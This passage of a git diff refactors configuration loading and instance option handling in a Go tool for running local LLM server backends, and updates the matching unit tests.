||||
t.Errorf("Found --model flag, but model should be positional argument in args: %v", args)
|
||||
}
|
||||
|
||||
// Check other flags
|
||||
if !testutil.ContainsFlagWithValue(args, "--tensor-parallel-size", "2") {
|
||||
t.Errorf("Expected --tensor-parallel-size 2 not found in %v", args)
|
||||
}
|
||||
if !testutil.ContainsFlagWithValue(args, "--gpu-memory-utilization", "0.8") {
|
||||
t.Errorf("Expected --gpu-memory-utilization 0.8 not found in %v", args)
|
||||
}
|
||||
if !testutil.Contains(args, "--enable-log-outputs") {
|
||||
t.Errorf("Expected --enable-log-outputs not found in %v", args)
|
||||
}
|
||||
if !testutil.ContainsFlagWithValue(args, "--host", "localhost") {
|
||||
t.Errorf("Expected --host localhost not found in %v", args)
|
||||
}
|
||||
if !testutil.ContainsFlagWithValue(args, "--port", "8080") {
|
||||
t.Errorf("Expected --port 8080 not found in %v", args)
|
||||
}
|
||||
}
|
||||
@@ -150,9 +150,7 @@ func LoadConfig(configPath string) (AppConfig, error) {
|
||||
EnableSwagger: false,
|
||||
},
|
||||
LocalNode: "main",
|
||||
Nodes: map[string]NodeConfig{
|
||||
"main": {}, // Local node with empty config
|
||||
},
|
||||
Nodes: map[string]NodeConfig{},
|
||||
Backends: BackendConfig{
|
||||
LlamaCpp: BackendSettings{
|
||||
Command: "llama-server",
|
||||
@@ -217,6 +215,11 @@ func LoadConfig(configPath string) (AppConfig, error) {
|
||||
return cfg, err
|
||||
}
|
||||
|
||||
// If local node is not defined in nodes, add it with default config
|
||||
if _, ok := cfg.Nodes[cfg.LocalNode]; !ok {
|
||||
cfg.Nodes[cfg.LocalNode] = NodeConfig{}
|
||||
}
|
||||
|
||||
// 3. Override with environment variables
|
||||
loadEnvVars(&cfg)
|
||||
|
||||
@@ -601,17 +604,3 @@ func getDefaultConfigLocations() []string {
|
||||
|
||||
return locations
|
||||
}
|
||||
|
||||
// GetBackendSettings resolves backend settings
|
||||
func (bc *BackendConfig) GetBackendSettings(backendType string) BackendSettings {
|
||||
switch backendType {
|
||||
case "llama-cpp":
|
||||
return bc.LlamaCpp
|
||||
case "vllm":
|
||||
return bc.VLLM
|
||||
case "mlx":
|
||||
return bc.MLX
|
||||
default:
|
||||
return BackendSettings{}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -7,6 +7,20 @@ import (
|
||||
"testing"
|
||||
)
|
||||
|
||||
// GetBackendSettings resolves backend settings
|
||||
func getBackendSettings(bc *config.BackendConfig, backendType string) config.BackendSettings {
|
||||
switch backendType {
|
||||
case "llama-cpp":
|
||||
return bc.LlamaCpp
|
||||
case "vllm":
|
||||
return bc.VLLM
|
||||
case "mlx":
|
||||
return bc.MLX
|
||||
default:
|
||||
return config.BackendSettings{}
|
||||
}
|
||||
}
|
||||
|
||||
func TestLoadConfig_Defaults(t *testing.T) {
|
||||
// Test loading config when no file exists and no env vars set
|
||||
cfg, err := config.LoadConfig("nonexistent-file.yaml")
|
||||
@@ -205,29 +219,6 @@ instances:
|
||||
}
|
||||
}
|
||||
|
||||
func TestLoadConfig_InvalidYAML(t *testing.T) {
|
||||
// Create a temporary config file with invalid YAML
|
||||
tempDir := t.TempDir()
|
||||
configFile := filepath.Join(tempDir, "invalid-config.yaml")
|
||||
|
||||
invalidContent := `
|
||||
server:
|
||||
host: "localhost"
|
||||
port: not-a-number
|
||||
instances:
|
||||
[invalid yaml structure
|
||||
`
|
||||
|
||||
err := os.WriteFile(configFile, []byte(invalidContent), 0644)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to write test config file: %v", err)
|
||||
}
|
||||
|
||||
_, err = config.LoadConfig(configFile)
|
||||
if err == nil {
|
||||
t.Error("Expected LoadConfig to return error for invalid YAML")
|
||||
}
|
||||
}
|
||||
|
||||
func TestParsePortRange(t *testing.T) {
|
||||
tests := []struct {
|
||||
@@ -257,97 +248,6 @@ func TestParsePortRange(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
// Remove the getDefaultConfigLocations test entirely
|
||||
|
||||
func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
|
||||
// Test that environment variables are properly converted to correct types
|
||||
testCases := []struct {
|
||||
envVar string
|
||||
envValue string
|
||||
checkFn func(*config.AppConfig) bool
|
||||
desc string
|
||||
}{
|
||||
{
|
||||
envVar: "LLAMACTL_PORT",
|
||||
envValue: "invalid-port",
|
||||
checkFn: func(c *config.AppConfig) bool { return c.Server.Port == 8080 }, // Should keep default
|
||||
desc: "invalid port number should keep default",
|
||||
},
|
||||
{
|
||||
envVar: "LLAMACTL_MAX_INSTANCES",
|
||||
envValue: "not-a-number",
|
||||
checkFn: func(c *config.AppConfig) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
|
||||
desc: "invalid max instances should keep default",
|
||||
},
|
||||
{
|
||||
envVar: "LLAMACTL_DEFAULT_AUTO_RESTART",
|
||||
envValue: "invalid-bool",
|
||||
checkFn: func(c *config.AppConfig) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
|
||||
desc: "invalid boolean should keep default",
|
||||
},
|
||||
{
|
||||
envVar: "LLAMACTL_INSTANCE_PORT_RANGE",
|
||||
envValue: "invalid-range",
|
||||
checkFn: func(c *config.AppConfig) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
|
||||
desc: "invalid port range should keep default",
|
||||
},
|
||||
}
|
||||
|
||||
for _, tc := range testCases {
|
||||
t.Run(tc.desc, func(t *testing.T) {
|
||||
os.Setenv(tc.envVar, tc.envValue)
|
||||
defer os.Unsetenv(tc.envVar)
|
||||
|
||||
cfg, err := config.LoadConfig("nonexistent-file.yaml")
|
||||
if err != nil {
|
||||
t.Fatalf("LoadConfig failed: %v", err)
|
||||
}
|
||||
|
||||
if !tc.checkFn(&cfg) {
|
||||
t.Errorf("Test failed: %s", tc.desc)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestLoadConfig_PartialFile(t *testing.T) {
|
||||
// Test that partial config files work correctly (missing sections should use defaults)
|
||||
tempDir := t.TempDir()
|
||||
configFile := filepath.Join(tempDir, "partial-config.yaml")
|
||||
|
||||
// Only specify server config, instances should use defaults
|
||||
configContent := `
|
||||
server:
|
||||
host: "partial-host"
|
||||
port: 7777
|
||||
`
|
||||
|
||||
err := os.WriteFile(configFile, []byte(configContent), 0644)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to write test config file: %v", err)
|
||||
}
|
||||
|
||||
cfg, err := config.LoadConfig(configFile)
|
||||
if err != nil {
|
||||
t.Fatalf("LoadConfig failed: %v", err)
|
||||
}
|
||||
|
||||
// Server config should be from file
|
||||
if cfg.Server.Host != "partial-host" {
|
||||
t.Errorf("Expected host 'partial-host', got %q", cfg.Server.Host)
|
||||
}
|
||||
if cfg.Server.Port != 7777 {
|
||||
t.Errorf("Expected port 7777, got %d", cfg.Server.Port)
|
||||
}
|
||||
|
||||
// Instances config should be defaults
|
||||
if cfg.Instances.PortRange != [2]int{8000, 9000} {
|
||||
t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange)
|
||||
}
|
||||
if cfg.Instances.MaxInstances != -1 {
|
||||
t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
|
||||
}
|
||||
}
|
||||
|
||||
func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
|
||||
bc := &config.BackendConfig{
|
||||
@@ -372,7 +272,7 @@ func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
|
||||
}
|
||||
|
||||
// Test llama-cpp with Docker
|
||||
settings := bc.GetBackendSettings("llama-cpp")
|
||||
settings := getBackendSettings(bc, "llama-cpp")
|
||||
if settings.Command != "custom-llama" {
|
||||
t.Errorf("Expected command 'custom-llama', got %q", settings.Command)
|
||||
}
|
||||
@@ -387,7 +287,7 @@ func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
|
||||
}
|
||||
|
||||
// Test vLLM without Docker
|
||||
settings = bc.GetBackendSettings("vllm")
|
||||
settings = getBackendSettings(bc, "vllm")
|
||||
if settings.Command != "custom-vllm" {
|
||||
t.Errorf("Expected command 'custom-vllm', got %q", settings.Command)
|
||||
}
|
||||
@@ -399,33 +299,12 @@ func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
|
||||
}
|
||||
|
||||
// Test MLX
|
||||
settings = bc.GetBackendSettings("mlx")
|
||||
settings = getBackendSettings(bc, "mlx")
|
||||
if settings.Command != "custom-mlx" {
|
||||
t.Errorf("Expected command 'custom-mlx', got %q", settings.Command)
|
||||
}
|
||||
}
|
||||
|
||||
func TestGetBackendSettings_EmptyConfig(t *testing.T) {
|
||||
bc := &config.BackendConfig{}
|
||||
|
||||
// Test empty llama-cpp
|
||||
settings := bc.GetBackendSettings("llama-cpp")
|
||||
if settings.Command != "" {
|
||||
t.Errorf("Expected empty command, got %q", settings.Command)
|
||||
}
|
||||
|
||||
// Test empty vLLM
|
||||
settings = bc.GetBackendSettings("vllm")
|
||||
if settings.Command != "" {
|
||||
t.Errorf("Expected empty command, got %q", settings.Command)
|
||||
}
|
||||
|
||||
// Test empty MLX
|
||||
settings = bc.GetBackendSettings("mlx")
|
||||
if settings.Command != "" {
|
||||
t.Errorf("Expected empty command, got %q", settings.Command)
|
||||
}
|
||||
}
|
||||
|
||||
func TestLoadConfig_BackendEnvironmentVariables(t *testing.T) {
|
||||
// Test that backend environment variables work correctly
|
||||
@@ -496,20 +375,6 @@ func TestLoadConfig_BackendEnvironmentVariables(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestGetBackendSettings_InvalidBackendType(t *testing.T) {
|
||||
bc := &config.BackendConfig{
|
||||
LlamaCpp: config.BackendSettings{
|
||||
Command: "llama-server",
|
||||
Args: []string{},
|
||||
},
|
||||
}
|
||||
|
||||
// Test invalid backend type returns empty settings
|
||||
settings := bc.GetBackendSettings("invalid-backend")
|
||||
if settings.Command != "" {
|
||||
t.Errorf("Expected empty command for invalid backend, got %q", settings.Command)
|
||||
}
|
||||
}
|
||||
|
||||
func TestLoadConfig_LocalNode(t *testing.T) {
|
||||
t.Run("default local node", func(t *testing.T) {
|
||||
@@ -552,8 +417,8 @@ nodes:
|
||||
}
|
||||
|
||||
// Verify nodes map (includes default "main" + worker1 + worker2)
|
||||
if len(cfg.Nodes) != 3 {
|
||||
t.Errorf("Expected 3 nodes (default main + worker1 + worker2), got %d", len(cfg.Nodes))
|
||||
if len(cfg.Nodes) != 2 {
|
||||
t.Errorf("Expected 2 nodes (default worker1 + worker2), got %d", len(cfg.Nodes))
|
||||
}
|
||||
|
||||
// Verify local node exists and is empty
|
||||
@@ -579,8 +444,8 @@ nodes:
|
||||
|
||||
// Verify default main node still exists
|
||||
_, exists = cfg.Nodes["main"]
|
||||
if !exists {
|
||||
t.Error("Expected default 'main' node to still exist in nodes map")
|
||||
if exists {
|
||||
t.Error("Default 'main' node should not exist when local_node is overridden")
|
||||
}
|
||||
})
|
||||
|
||||
@@ -612,8 +477,8 @@ nodes:
|
||||
}
|
||||
|
||||
// Verify nodes map includes default "main" + primary + worker1
|
||||
if len(cfg.Nodes) != 3 {
|
||||
t.Errorf("Expected 3 nodes (default main + primary + worker1), got %d", len(cfg.Nodes))
|
||||
if len(cfg.Nodes) != 2 {
|
||||
t.Errorf("Expected 2 nodes (primary + worker1), got %d", len(cfg.Nodes))
|
||||
}
|
||||
|
||||
localNode, exists := cfg.Nodes["primary"]
|
||||
|
||||
@@ -3,7 +3,6 @@ package instance
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/config"
|
||||
"log"
|
||||
"net/http/httputil"
|
||||
@@ -124,48 +123,6 @@ func (i *Instance) IsRunning() bool {
|
||||
return i.status.isRunning()
|
||||
}
|
||||
|
||||
func (i *Instance) GetPort() int {
|
||||
opts := i.GetOptions()
|
||||
if opts != nil {
|
||||
switch opts.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
if opts.LlamaServerOptions != nil {
|
||||
return opts.LlamaServerOptions.Port
|
||||
}
|
||||
case backends.BackendTypeMlxLm:
|
||||
if opts.MlxServerOptions != nil {
|
||||
return opts.MlxServerOptions.Port
|
||||
}
|
||||
case backends.BackendTypeVllm:
|
||||
if opts.VllmServerOptions != nil {
|
||||
return opts.VllmServerOptions.Port
|
||||
}
|
||||
}
|
||||
}
|
||||
return 0
|
||||
}
|
||||
|
||||
func (i *Instance) GetHost() string {
|
||||
opts := i.GetOptions()
|
||||
if opts != nil {
|
||||
switch opts.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
if opts.LlamaServerOptions != nil {
|
||||
return opts.LlamaServerOptions.Host
|
||||
}
|
||||
case backends.BackendTypeMlxLm:
|
||||
if opts.MlxServerOptions != nil {
|
||||
return opts.MlxServerOptions.Host
|
||||
}
|
||||
case backends.BackendTypeVllm:
|
||||
if opts.VllmServerOptions != nil {
|
||||
return opts.VllmServerOptions.Host
|
||||
}
|
||||
}
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
// SetOptions sets the options
|
||||
func (i *Instance) SetOptions(opts *Options) {
|
||||
if opts == nil {
|
||||
@@ -198,6 +155,20 @@ func (i *Instance) SetTimeProvider(tp TimeProvider) {
|
||||
}
|
||||
}
|
||||
|
||||
func (i *Instance) GetHost() string {
|
||||
if i.options == nil {
|
||||
return "localhost"
|
||||
}
|
||||
return i.options.GetHost()
|
||||
}
|
||||
|
||||
func (i *Instance) GetPort() int {
|
||||
if i.options == nil {
|
||||
return 0
|
||||
}
|
||||
return i.options.GetPort()
|
||||
}
|
||||
|
||||
// GetProxy returns the reverse proxy for this instance
|
||||
func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
|
||||
if i.proxy == nil {
|
||||
@@ -266,39 +237,31 @@ func (i *Instance) ShouldTimeout() bool {
|
||||
return i.proxy.shouldTimeout()
|
||||
}
|
||||
|
||||
// getBackendHostPort extracts the host and port from instance options
|
||||
// Returns the configured host and port for the backend
|
||||
func (i *Instance) getBackendHostPort() (string, int) {
|
||||
func (i *Instance) getCommand() string {
|
||||
opts := i.GetOptions()
|
||||
if opts == nil {
|
||||
return "localhost", 0
|
||||
return ""
|
||||
}
|
||||
|
||||
var host string
|
||||
var port int
|
||||
switch opts.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
if opts.LlamaServerOptions != nil {
|
||||
host = opts.LlamaServerOptions.Host
|
||||
port = opts.LlamaServerOptions.Port
|
||||
}
|
||||
case backends.BackendTypeMlxLm:
|
||||
if opts.MlxServerOptions != nil {
|
||||
host = opts.MlxServerOptions.Host
|
||||
port = opts.MlxServerOptions.Port
|
||||
}
|
||||
case backends.BackendTypeVllm:
|
||||
if opts.VllmServerOptions != nil {
|
||||
host = opts.VllmServerOptions.Host
|
||||
port = opts.VllmServerOptions.Port
|
||||
}
|
||||
return opts.BackendOptions.GetCommand(i.globalBackendSettings)
|
||||
}
|
||||
|
||||
func (i *Instance) buildCommandArgs() []string {
|
||||
opts := i.GetOptions()
|
||||
if opts == nil {
|
||||
return nil
|
||||
}
|
||||
|
||||
if host == "" {
|
||||
host = "localhost"
|
||||
return opts.BackendOptions.BuildCommandArgs(i.globalBackendSettings)
|
||||
}
|
||||
|
||||
func (i *Instance) buildEnvironment() map[string]string {
|
||||
opts := i.GetOptions()
|
||||
if opts == nil {
|
||||
return nil
|
||||
}
|
||||
|
||||
return host, port
|
||||
return opts.BackendOptions.BuildEnvironment(i.globalBackendSettings, opts.Environment)
|
||||
}
|
||||
|
||||
// MarshalJSON implements json.Marshaler for Instance
|
||||
@@ -307,21 +270,7 @@ func (i *Instance) MarshalJSON() ([]byte, error) {
|
||||
opts := i.GetOptions()
|
||||
|
||||
// Determine if docker is enabled for this instance's backend
|
||||
var dockerEnabled bool
|
||||
if opts != nil {
|
||||
switch opts.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
if i.globalBackendSettings != nil && i.globalBackendSettings.LlamaCpp.Docker != nil && i.globalBackendSettings.LlamaCpp.Docker.Enabled {
|
||||
dockerEnabled = true
|
||||
}
|
||||
case backends.BackendTypeVllm:
|
||||
if i.globalBackendSettings != nil && i.globalBackendSettings.VLLM.Docker != nil && i.globalBackendSettings.VLLM.Docker.Enabled {
|
||||
dockerEnabled = true
|
||||
}
|
||||
case backends.BackendTypeMlxLm:
|
||||
// MLX does not support docker currently
|
||||
}
|
||||
}
|
||||
dockerEnabled := opts.BackendOptions.IsDockerEnabled(i.globalBackendSettings)
|
||||
|
||||
return json.Marshal(&struct {
|
||||
Name string `json:"name"`
|
||||
|
||||
@@ -3,7 +3,6 @@ package instance_test
|
||||
import (
|
||||
"encoding/json"
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"llamactl/pkg/config"
|
||||
"llamactl/pkg/instance"
|
||||
"llamactl/pkg/testutil"
|
||||
@@ -35,10 +34,12 @@ func TestNewInstance(t *testing.T) {
|
||||
}
|
||||
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -56,8 +57,8 @@ func TestNewInstance(t *testing.T) {
|
||||
|
||||
// Check that options were properly set with defaults applied
|
||||
opts := inst.GetOptions()
|
||||
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
|
||||
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
|
||||
if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/model.gguf" {
|
||||
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
|
||||
}
|
||||
if inst.GetPort() != 8080 {
|
||||
t.Errorf("Expected port 8080, got %d", inst.GetPort())
|
||||
@@ -73,61 +74,29 @@ func TestNewInstance(t *testing.T) {
|
||||
if opts.RestartDelay == nil || *opts.RestartDelay != 5 {
|
||||
t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay)
|
||||
}
|
||||
}
|
||||
|
||||
func TestNewInstance_WithRestartOptions(t *testing.T) {
|
||||
backendConfig := &config.BackendConfig{
|
||||
LlamaCpp: config.BackendSettings{
|
||||
Command: "llama-server",
|
||||
Args: []string{},
|
||||
},
|
||||
MLX: config.BackendSettings{
|
||||
Command: "mlx_lm.server",
|
||||
Args: []string{},
|
||||
},
|
||||
VLLM: config.BackendSettings{
|
||||
Command: "vllm",
|
||||
Args: []string{"serve"},
|
||||
},
|
||||
}
|
||||
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
|
||||
// Override some defaults
|
||||
// Test that explicit values override defaults
|
||||
autoRestart := false
|
||||
maxRestarts := 10
|
||||
restartDelay := 15
|
||||
|
||||
options := &instance.Options{
|
||||
optionsWithOverrides := &instance.Options{
|
||||
AutoRestart: &autoRestart,
|
||||
MaxRestarts: &maxRestarts,
|
||||
RestartDelay: &restartDelay,
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
// Mock onStatusChange function
|
||||
mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
|
||||
inst2 := instance.New("test-override", backendConfig, globalSettings, optionsWithOverrides, "main", mockOnStatusChange)
|
||||
opts2 := inst2.GetOptions()
|
||||
|
||||
instance := instance.New("test-instance", backendConfig, globalSettings, options, "main", mockOnStatusChange)
|
||||
opts := instance.GetOptions()
|
||||
|
||||
// Check that explicit values override defaults
|
||||
if opts.AutoRestart == nil || *opts.AutoRestart {
|
||||
if opts2.AutoRestart == nil || *opts2.AutoRestart {
|
||||
t.Error("Expected AutoRestart to be false (overridden)")
|
||||
}
|
||||
if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 {
|
||||
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts)
|
||||
}
|
||||
if opts.RestartDelay == nil || *opts.RestartDelay != 15 {
|
||||
t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay)
|
||||
if opts2.MaxRestarts == nil || *opts2.MaxRestarts != 10 {
|
||||
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts2.MaxRestarts)
|
||||
}
|
||||
}
|
||||
|
||||
@@ -155,10 +124,12 @@ func TestSetOptions(t *testing.T) {
|
||||
}
|
||||
|
||||
initialOptions := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -169,18 +140,20 @@ func TestSetOptions(t *testing.T) {
|
||||
|
||||
// Update options
|
||||
newOptions := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
Port: 8081,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
Port: 8081,
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
inst.SetOptions(newOptions)
|
||||
opts := inst.GetOptions()
|
||||
|
||||
if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
|
||||
if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
|
||||
}
|
||||
if inst.GetPort() != 8081 {
|
||||
t.Errorf("Expected updated port 8081, got %d", inst.GetPort())
|
||||
@@ -192,58 +165,6 @@ func TestSetOptions(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestSetOptions_PreservesNodes(t *testing.T) {
|
||||
backendConfig := &config.BackendConfig{
|
||||
LlamaCpp: config.BackendSettings{
|
||||
Command: "llama-server",
|
||||
Args: []string{},
|
||||
},
|
||||
}
|
||||
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
|
||||
// Create instance with initial nodes
|
||||
initialOptions := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
Nodes: map[string]struct{}{"worker1": {}},
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
|
||||
inst := instance.New("test-instance", backendConfig, globalSettings, initialOptions, "main", mockOnStatusChange)
|
||||
|
||||
// Try to update with different nodes
|
||||
updatedOptions := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
Nodes: map[string]struct{}{"worker2": {}}, // Attempt to change node
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
Port: 8081,
|
||||
},
|
||||
}
|
||||
|
||||
inst.SetOptions(updatedOptions)
|
||||
opts := inst.GetOptions()
|
||||
|
||||
// Nodes should remain unchanged
|
||||
if _, exists := opts.Nodes["worker1"]; len(opts.Nodes) != 1 || !exists {
|
||||
t.Errorf("Expected nodes to contain 'worker1', got %v", opts.Nodes)
|
||||
}
|
||||
|
||||
// Other options should be updated
|
||||
if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
|
||||
}
|
||||
}
|
||||
|
||||
func TestGetProxy(t *testing.T) {
|
||||
backendConfig := &config.BackendConfig{
|
||||
LlamaCpp: config.BackendSettings{
|
||||
@@ -265,10 +186,13 @@ func TestGetProxy(t *testing.T) {
|
||||
}
|
||||
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Host: "localhost",
|
||||
Port: 8080,
|
||||
Nodes: map[string]struct{}{"main": {}},
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Host: "localhost",
|
||||
Port: 8080,
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -298,49 +222,29 @@ func TestGetProxy(t *testing.T) {
|
||||
|
||||
func TestMarshalJSON(t *testing.T) {
|
||||
backendConfig := &config.BackendConfig{
|
||||
LlamaCpp: config.BackendSettings{
|
||||
Command: "llama-server",
|
||||
Args: []string{},
|
||||
},
|
||||
MLX: config.BackendSettings{
|
||||
Command: "mlx_lm.server",
|
||||
Args: []string{},
|
||||
},
|
||||
VLLM: config.BackendSettings{
|
||||
Command: "vllm",
|
||||
Args: []string{"serve"},
|
||||
},
|
||||
LlamaCpp: config.BackendSettings{Command: "llama-server"},
|
||||
}
|
||||
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
|
||||
globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"}
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
// Mock onStatusChange function
|
||||
mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
|
||||
inst := instance.New("test-instance", backendConfig, globalSettings, options, "main", nil)
|
||||
|
||||
instance := instance.New("test-instance", backendConfig, globalSettings, options, "main", mockOnStatusChange)
|
||||
|
||||
data, err := json.Marshal(instance)
|
||||
data, err := json.Marshal(inst)
|
||||
if err != nil {
|
||||
t.Fatalf("JSON marshal failed: %v", err)
|
||||
}
|
||||
|
||||
// Check that JSON contains expected fields
|
||||
// Verify by unmarshaling and checking key fields
|
||||
var result map[string]any
|
||||
err = json.Unmarshal(data, &result)
|
||||
if err != nil {
|
||||
if err := json.Unmarshal(data, &result); err != nil {
|
||||
t.Fatalf("JSON unmarshal failed: %v", err)
|
||||
}
|
||||
|
||||
@@ -350,37 +254,9 @@ func TestMarshalJSON(t *testing.T) {
|
||||
if result["status"] != "stopped" {
|
||||
t.Errorf("Expected status 'stopped', got %v", result["status"])
|
||||
}
|
||||
|
||||
// Check that options are included
|
||||
options_data, ok := result["options"]
|
||||
if !ok {
|
||||
if result["options"] == nil {
|
||||
t.Error("Expected options to be included in JSON")
|
||||
}
|
||||
options_map, ok := options_data.(map[string]interface{})
|
||||
if !ok {
|
||||
t.Error("Expected options to be a map")
|
||||
}
|
||||
|
||||
// Check backend type
|
||||
if options_map["backend_type"] != string(backends.BackendTypeLlamaCpp) {
|
||||
t.Errorf("Expected backend_type '%s', got %v", backends.BackendTypeLlamaCpp, options_map["backend_type"])
|
||||
}
|
||||
|
||||
// Check backend options
|
||||
backend_options_data, ok := options_map["backend_options"]
|
||||
if !ok {
|
||||
t.Error("Expected backend_options to be included in JSON")
|
||||
}
|
||||
backend_options_map, ok := backend_options_data.(map[string]any)
|
||||
if !ok {
|
||||
t.Error("Expected backend_options to be a map")
|
||||
}
|
||||
if backend_options_map["model"] != "/path/to/model.gguf" {
|
||||
t.Errorf("Expected model '/path/to/model.gguf', got %v", backend_options_map["model"])
|
||||
}
|
||||
if backend_options_map["port"] != float64(8080) {
|
||||
t.Errorf("Expected port 8080, got %v", backend_options_map["port"])
|
||||
}
|
||||
}
|
||||
|
||||
func TestUnmarshalJSON(t *testing.T) {
|
||||
@@ -415,14 +291,14 @@ func TestUnmarshalJSON(t *testing.T) {
|
||||
if opts == nil {
|
||||
t.Fatal("Expected options to be set")
|
||||
}
|
||||
if opts.BackendType != backends.BackendTypeLlamaCpp {
|
||||
t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendType)
|
||||
